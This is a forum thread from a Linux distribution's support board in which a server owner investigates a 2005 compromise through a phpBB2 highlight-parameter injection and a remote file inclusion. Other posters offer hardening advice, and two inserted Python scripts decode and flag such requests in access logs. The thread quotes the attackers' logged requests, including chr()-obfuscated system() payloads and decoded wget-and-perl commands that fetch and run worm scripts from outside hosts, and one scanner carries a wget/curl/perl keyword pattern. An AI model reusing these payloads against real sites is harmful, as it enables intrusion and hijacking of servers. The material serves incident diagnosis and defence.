# Some kind of hacking attempt with apache? [RESOLVED]

## uncleringo

Hi

I received an email from my server hosting company today alerting me to the fact that there had been an unusual amount of traffic from my server since last night.

Upon running top I saw 3 perl processes, each taking up around 30% CPU, which had been running for some hours.

********[edit]*********

I jumped to the conclusion that references to perl in my apache logs pointed to the culprit. But having had some time to think about those log entries, I am now certain that they can't have been to blame. My scripts don't do anything dangerous like taking arbitrary parameters and parsing, or even worse, executing them.

********[edit2]********

It seems a vulnerability was exploited in phpBB2. The following apache access log entries look like the culprits:

```
65.16.108.130 - - [03/Mar/2005:09:25:09 +0100] "GET /phpBB2/viewtopic.php?t=77&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 32736 "-" "Mozilla/4.0"

65.16.108.130 - - [03/Mar/2005:09:25:10 +0100] "GET /phpBB2/viewtopic.php?t=77&highlight=%2527%252Esystem(chr(109)%252Echr(107)%252Echr(100)%252Echr(105)%252Echr(114)%252Echr(32)%252Echr(47)%252Echr(116)%252Echr(109)%252Echr(112)%252Echr(47)%252Echr(46)%252Echr(98)%252Echr(111)%252Echr(102)%252Echr(59)%252Echr(119)%252Echr(103)%252Echr(101)%252Echr(116)%252Echr(32)%252Echr(102)%252Echr(114)%252Echr(97)%252Echr(103)%252Echr(46)%252Echr(112)%252Echr(114)%252Echr(111)%252Echr(46)%252Echr(98)%252Echr(114)%252Echr(47)%252Echr(100)%252Echr(101)%252Echr(97)%252Echr(100)%252Echr(99)%252Echr(111)%252Echr(119)%252Echr(47)%252Echr(102)%252Echr(100)%252Echr(32)%252Echr(45)%252Echr(79)%252Echr(32)%252Echr(47)%252Echr(116)%252Echr(109)%252Echr(112)%252Echr(47)%252Echr(46)%252Echr(98)%252Echr(111)%252Echr(102)%252Echr(47)%252Echr(46)%252Echr(102)%252Echr(100)%252Echr(59)%252Echr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(47)%252Echr(116)%252Echr(109)%252Echr(112)%252Echr(47)%252Echr(46)%252Echr(98)%252Echr(111)%252Echr(102)%252Echr(47)%252Echr(46)%252Echr(102)%252Echr(100))%252E%2527 HTTP/1.0" 200 51870 "-" "Mozilla/4.0"

65.16.108.130 - - [03/Mar/2005:09:25:14 +0100] "GET /phpBB2/viewtopic.php?t=77&highlight=%2527%252Esystem(chr(119)%252Echr(103)%252Echr(101)%252Echr(116)%252Echr(32)%252Echr(102)%252Echr(114)%252Echr(97)%252Echr(103)%252Echr(46)%252Echr(112)%252Echr(114)%252Echr(111)%252Echr(46)%252Echr(98)%252Echr(114)%252Echr(47)%252Echr(100)%252Echr(101)%252Echr(97)%252Echr(100)%252Echr(99)%252Echr(111)%252Echr(119)%252Echr(47)%252Echr(98)%252Echr(111)%252Echr(116)%252Echr(32)%252Echr(45)%252Echr(79)%252Echr(32)%252Echr(47)%252Echr(116)%252Echr(109)%252Echr(112)%252Echr(47)%252Echr(46)%252Echr(98)%252Echr(111)%252Echr(102)%252Echr(47)%252Echr(46)%252Echr(98)%252Echr(111)%252Echr(116)%252Echr(59)%252Echr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(47)%252Echr(116)%252Echr(109)%252Echr(112)%252Echr(47)%252Echr(46)%252Echr(98)%252Echr(111)%252Echr(102)%252Echr(47)%252Echr(46)%252Echr(98)%252Echr(111)%252Echr(116)%252Echr(59)%252Echr(116)%252Echr(111)%252Echr(117)%252Echr(99)%252Echr(104)%252Echr(32)%252Echr(47)%252Echr(116)%252Echr(109)%252Echr(112)%252Echr(47)%252Echr(46)%252Echr(98)%252Echr(115)%252Echr(101)%252Echr(116))%252E%2527 HTTP/1.0" 200 51934 "-" "Mozilla/4.0"
```

They're basically passing arguments to phpbb2 to execute system commands. When all those chr(n)'s are decoded it looks more like this:

```
system('perl -e "print q(jSVowMsd)"')

system('mkdir /tmp/.bof;wget frag.pro.br/deadcow/fd -O /tmp/.bof/.fd;perl /tmp/.bof/.fd')

system('wget frag.pro.br/deadcow/bot -O /tmp/.bof/.bot;perl /tmp/.bof/.bot;touch /tmp/.bset')
```

Isn't that nice. So beware, keep phpBB2 up to date (and everything else for that matter!). I've learnt my lesson.

Last edited by uncleringo on Thu Mar 03, 2005 4:49 pm; edited 3 times in total
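
A way to read entries like these without decoding the chr() chains by hand, added here as an example that is not part of the original thread or of phpBB: the script below parses Apache access-log lines, undoes the double percent-encoding visible in the log (%2527, %252E), rewrites each chr(n).chr(m)... chain into the string it builds, and flags requests whose `highlight` parameter resolves to a PHP command-execution call. The first sample line is the first log entry quoted in the post above; the second is a constructed, harmless search request used as a negative control. The regexes and function names are the example's own.

```python
import re
from urllib.parse import unquote

# Apache common/combined log prefix: client IP ... [timestamp] "METHOD URL HTTP/x.y".
LOG_RE = re.compile(
    r'^(?P<ip>\d+\.\d+\.\d+\.\d+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+"'
)
# A PHP expression such as chr(112).chr(101)... that spells a string byte by byte.
CHR_CHAIN_RE = re.compile(r'chr\(\d{1,3}\)(?:\s*\.\s*chr\(\d{1,3}\))*')
CHR_NUM_RE = re.compile(r'chr\((\d{1,3})\)')
# PHP calls that hand a string to the shell; one of these inside a search
# parameter is the indicator this scan looks for.
EXEC_CALL_RE = re.compile(r'\b(system|exec|passthru|shell_exec|popen)\s*\(', re.I)


def decode_twice(value: str) -> str:
    """Undo two layers of percent-encoding. The log shows %2527 and %252E,
    i.e. the payload was encoded twice so that one layer survives the web
    server's decoding and is removed later by the application itself."""
    return unquote(unquote(value))


def deobfuscate_chr(expr: str) -> str:
    """Replace every chr(n).chr(m)... chain with the quoted literal it builds."""
    def join_chain(match):
        text = ''.join(chr(int(n)) for n in CHR_NUM_RE.findall(match.group(0)))
        return "'" + text + "'"
    return CHR_CHAIN_RE.sub(join_chain, expr)


def decode_highlight(line: str):
    """Return (client_ip, decoded highlight value) for a request carrying a
    highlight= parameter, or None for any other line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    q = re.search(r'[?&]highlight=([^&]*)', m.group('url'))
    if not q:
        return None
    return m.group('ip'), deobfuscate_chr(decode_twice(q.group(1)))


def find_injected_commands(lines):
    """Return [(client_ip, decoded expression)] for every line whose decoded
    highlight parameter contains a PHP command-execution call."""
    hits = []
    for line in lines:
        decoded = decode_highlight(line)
        if decoded and EXEC_CALL_RE.search(decoded[1]):
            hits.append(decoded)
    return hits


# First entry: the first access-log line quoted in the post above.
# Second entry: a constructed, ordinary search request (negative control).
SAMPLE_LINES = [
    '65.16.108.130 - - [03/Mar/2005:09:25:09 +0100] "GET /phpBB2/viewtopic.php?t=77'
    '&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)'
    '%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)'
    '%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)'
    '%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)'
    '%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527'
    ' HTTP/1.0" 200 32736 "-" "Mozilla/4.0"',
    '10.0.0.5 - - [03/Mar/2005:09:30:00 +0100] "GET /phpBB2/viewtopic.php?t=77'
    '&highlight=gentoo HTTP/1.1" 200 31000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, expr in find_injected_commands(SAMPLE_LINES):
        print(f"{ip}: {expr}")
```

Run over the three entries from the post, this prints the three system() strings shown above, which is what turns an opaque log line into a list of files to look for (/tmp/.bof, /tmp/.bset) and a timestamp to line up against when the perl processes started. The decode uses only the `highlight` parameter because that is where the injection sits in these entries; any parameter the application passes through urldecode() and then into eval-style code deserves the same treatment.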

----------

## j-m

Uhm, is this your web?!

http://www.ownz.go.ro/

*Quote:*

> HacKeD
> bY
> ...

If so, then you are asking quite late...  :Rolling Eyes: 

----------

## uncleringo

No it's not  :Smile: 

----------

## someguy

I wouldn't be smiling; they're going to finger you for it because they were using you as a relay  :Evil or Very Mad: 

----------

## uncleringo

Yes that may be the case, but until someone explains to me how this happened in the first place I have no idea how to stop it happening again.

Surely someone out there knows what these log entries mean?

----------

## fatalglitch

http://www.ownz.go.ro/is

This looks to be source code for an http based worm.....anyone who programs shed some light? I'm not exactly a code warrior....

-Tom

----------

## fatalglitch

This code appears to run around and check for a current vulnerability. My guess is you have it.

Once it exploits this vulnerability, it downloads, compiles and runs code in the /var/tmp directory.

Files to look for are:

.bo

bo.c

and mainly /var/tmp/.bst

This file was added at the end of the script...possibly a log file of some sort?

Language of comments in file are Portuguese....

That's about as much as I can help....

-Tom

----------

## fatalglitch

```
open LOG,">>.iz2";
```

one more thing.... the code opens a log file named .iz2

Try searching for that.

-Tom

P.S. If your site uses PostNuke content management software, that is what this bug is looking for....

/jSVowMsd/ is the URL as it appears. Check the forums of PostNuke, it's there....

----------

## uncleringo

Thanks. Have you any idea where I would start searching for it?

I have no content management software running. This is really looking like a mystery at the moment. The only log entry that appears around the start of my 15-20 Mb/s mayhemic network activity on Monday is the entry that mentions libperl:

```
193.129.101.36 - - [28/Feb/2005:17:14:24 +0100] "HEAD /index.php?content=folder&id=8828 HTTP/1.1" 200 - "-" "libwww-perl/5.69"
```

But this line has shown up 3 more times since then with no more bad things happening on my server. I really have to learn what exactly the logs report!

----------

## uncleringo

So, having read a little on the log format I now know that the "libwww-perl/5.69" bit is the user agent. Which doesn't really help me at all  :Confused: 

Maybe the problem didn't even come from apache?!

----------

## fatalglitch

That first link I sent of code....is written in perl....

If you are somehow allowing execution of remote code....that is how it happened.

He redirected libwww-perl's input to be from a remote file. The remote file then installed the worm on your server space and ran it.

That is how this happened.

-Tom

----------

## uncleringo

Ok, thanks for your time and help. None of the files you mentioned are to be found in /var/tmp however.

This machine had a fresh install of gentoo just over a week ago, and I've made minimal alterations to the apache config. So unless the default config is to allow remote execution of code then I don't see how any of this could have happened. It's a mystery to me.

----------

## someguy

::wow::

You might want to think about updating and hardening, and maybe even go as far as chrooting Apache. I did it on mine and it's really not all that hard  :Razz: 

----------

## uncleringo

Scary isn't it.

I'm currently going through the Gentoo Security Guide. I'm planning on setting up some sort of early warning system which checks for high cpu loads and bandwidth usage. I'm also going to use the logcheck tool as it seems like a very good idea.

If you say chrooting apache isn't difficult then I'll definitely do that too  :Smile: 

I wish I'd had more time to check where the perl processes had been started from etc. before killing them, but I was more concerned with stopping the 20 Mb/s traffic. Since I only get 50GB monthly traffic and this attack has generated at least 200GB, it's going to have been a costly experience for me when I get the bill. I am determined as hell not to let this ever happen again!

----------

## rex123

You say you have a default apache installation, and no content management software. But judging by your logs I would put money on this being an exploit of a known php bug (you seem to be running php). Most likely not in php itself, but in some php code that you have installed.

----------

## uncleringo

Ok, do you know of anything I can do to stop similar exploits other than unmerging php? Since upgrading the OS from redhat 8 to gentoo last week I also installed php 5 for the first time. Perhaps I should go back to php 4 since I'm not yet using any of the new features?

----------

## Shiner_Man

 *someguy wrote:*   

> ::wow::
> 
> You might want to think about updating and hardening, and maybe even go as far as chrooting Apache. I did it on mine and it's really not all that hard 

 

Can you link me to the "not all that hard" guide you used to chroot apache?

----------

## j-m

You could have a look at mod_security  :Wink: 

----------

## rex123

 *uncleringo wrote:*   

> Ok, do you know of anything I can do to stop similar exploits other than unmerging php? Since upgrading the OS from redhat 8 to gentoo last week I also installed php 5 for the first time. Perhaps I should go back to php 4 since I'm not yet using any of the new features?

 

If you are running any php code that wasn't written by you, check for updates from the authors. Or use emerge -u if you used emerge to get the code.

Also look at your php.ini, and consider enabling safe mode. This disables a load of stuff (see http://uk.php.net/manual/en/features.safe-mode.functions.php). You could also set safe_mode_exec_dir. See http://uk.php.net/features.safe-mode for more.

Read http://uk.php.net/manual/en/security.php as well if you like :)

----------

## uncleringo

Thanks for the advice. I'll have a read through the things you've pointed out.

----------

## rex123

By the way, this line

```
var/log/apache2/access_log:210.68.60.199 - - [24/Feb/2005:17:56:57 +0100] "GET /index.php?page=http://67.18.54.212/~greg/cmd.txt&cmd=wget%20www.ownz.go.ro/is%20-O%20/var/tmp/.is;perl%20/var/tmp/.is; HTTP/1.0" 200 19104 "-" "Mozilla/4.0"
```

from your logs shows that you have (or had) a page called index.php, which takes a parameter cmd. Whatever is sent in this parameter is executed by php (it seems). What someone did was to use this to execute

```
wget www.ownz.go.ro/is -O /var/tmp/.is
```

then 

```
perl /var/tmp/.is
```

/var/tmp/.is is an automated hacking script that does google searches for sites like yours, and runs itself there, etc.

It is easy to write a php script that does all that, and it doesn't mean you have a security hole in php itself. But it's not very sensible, because you are effectively allowing the world to run stuff on your computer. Which, sooner or later, they will probably do.
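
Added example, not from the thread or from any of the posters: the same kind of log triage for the pattern rex123 describes, a parameter whose value is an absolute URL next to a parameter that carries shell commands. A `page=` value pointing at a remote file is the usual shape of a remote file inclusion against code that does something like include($_GET['page']); that reading is an assumption of this example, not something the thread establishes. The script splits each request's query string, percent-decodes the values, and reports the remote URL and the decoded command so the fetched-and-run files can be looked for on disk. The first sample line is the entry quoted above as grep prints it (with the filename prefix); the second is a constructed ordinary request using the same parameter names the site's own logs show. Regexes and function names are the example's own.

```python
import re
from urllib.parse import unquote

# Apache log prefix, tolerating a leading "filename:" as grep prints it.
LOG_RE = re.compile(
    r'^(?:\S*?:)?(?P<ip>\d+\.\d+\.\d+\.\d+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+"'
)
# A parameter value that is itself an absolute URL (remote inclusion shape).
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.I)
# Download-and-run tooling or shell separators inside a parameter value.
SHELL_RE = re.compile(r'\b(?:wget|curl|perl|sh|bash|chmod)\b|[;|`]')


def query_params(url: str):
    """Split the query string on '&' only and percent-decode each value once.
    Splitting is done by hand so ';' inside a value is kept as part of it."""
    _, _, query = url.partition('?')
    for pair in query.split('&'):
        if not pair:
            continue
        key, _, value = pair.partition('=')
        yield key, unquote(value)


def inspect_request(line: str):
    """Return a finding dict for a line whose parameters look like remote
    inclusion or command passing, or None when nothing suspicious is found."""
    m = LOG_RE.match(line)
    if not m:
        return None
    remote, commands = [], []
    for key, value in query_params(m.group('url')):
        if REMOTE_URL_RE.match(value):
            remote.append((key, value))
        elif SHELL_RE.search(value):
            commands.append((key, value))
    if not remote and not commands:
        return None
    return {
        'ip': m.group('ip'),
        'time': m.group('ts'),
        'path': m.group('url').partition('?')[0],
        'remote_includes': remote,
        'commands': commands,
    }


def scan(lines):
    """Findings for every line that triggers at least one indicator."""
    return [f for f in map(inspect_request, lines) if f]


SAMPLE_LINES = [
    # The entry quoted in the post above, as grep prints it (filename prefix kept).
    'var/log/apache2/access_log:210.68.60.199 - - [24/Feb/2005:17:56:57 +0100] '
    '"GET /index.php?page=http://67.18.54.212/~greg/cmd.txt&cmd=wget%20www.ownz.go.ro/is'
    '%20-O%20/var/tmp/.is;perl%20/var/tmp/.is; HTTP/1.0" 200 19104 "-" "Mozilla/4.0"',
    # Constructed ordinary request with the parameter names seen elsewhere in the thread.
    '10.0.0.5 - - [24/Feb/2005:18:00:00 +0100] "GET /index.php?content=folder&id=8828 '
    'HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LINES):
        print(finding['time'], finding['ip'], finding['path'])
        for key, value in finding['remote_includes']:
            print('  remote include via', key, '->', value)
        for key, value in finding['commands']:
            print('  command in', key, '->', value)
```

The decoded `cmd` value names /var/tmp/.is as both the download target and the file handed to perl, which is exactly the location fatalglitch suggested searching earlier in the thread; the timestamp gives the point from which process and file creation times should be compared. The `page` finding is the one that matters for the fix: whichever script honours a URL there is the flaw, independent of whether `cmd` is read anywhere in the site's own code, because the included remote file is what reads it.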

----------

## uncleringo

You're correct in saying that I have a script called index.php. However, I do not take any parameters and actually execute them on the machine. cmd is not used in any php scripts I have. I know that would be an extremely silly thing to do  :Smile: 

----------

## j-m

 *uncleringo wrote:*   

> You're correct in saying that I have a script called index.php. However, I do not take any parameters and actually execute them on the machine. cmd is not used in any php scripts I have. I know that would be an extremely silly thing to do 

 

Ehm, I would suggest auditing the script as obviously there are some serious security flaws.  :Razz: 

----------

## uncleringo

Ehm.. The script DOES NOT execute system commands. It takes a very limited number of arguments and there is no way of getting it to do anything nasty.

----------

## j-m

 *uncleringo wrote:*   

> Ehm.. The script DOES NOT execute system commands. It takes a very limited number of arguments and there is no way of getting it to do anything nasty.

 

Well, seeing the logs, the script is vulnerable to cross-site scripting. That's probably all I can say.

----------

## uncleringo

It seems to me that the logs show an attempt to do some cross-site scripting, but they definitely wouldn't have succeeded since I don't parse any of the suspect arguments. I was assuming that these log entries were responsible for the appearance of some rogue perl processes, but I now realise that these accesses could not (through my scripts at least) have caused any harm.

I'm actually starting to get a little suspicious of my hosting company since I recently negotiated a lower price from them, and they performed the gentoo installation shortly after that. AND they've just tried to charge me for extra traffic that was in fact due to backups to their own servers which are located inside the same network as my server  :Evil or Very Mad: 

----------

## fatalglitch

if you don't mind me asking, who is your hosting company?

If your site is not TOO bandwidth intensive, I have a box that runs hosting and could possibly help you out in the meantime if you were to switch. Let me know.

-Tom

----------

## uncleringo

That's really kind of you, but unfortunately I'm stuck in a 12 month contract which doesn't expire until October. I may have been a little hasty to start pointing my finger at them (webhosting24.co.uk) for this particular problem, as it seems a vulnerability with phpBB2 was to blame. However that doesn't excuse them for trying to get over £400 out of me for traffic generated by backing up to their own backup server!

The site I have running on this server is www.albumsnaps.com. I don't know how much you mean by 'too bandwidth intensive' but it generates about 25GB/month (half of my allowance). And also I expect you'd be put off by it having around 40GB of photos stored on it?

Thanks again for your offer though. There are definitely some nice people in the world  :Smile: 

----------

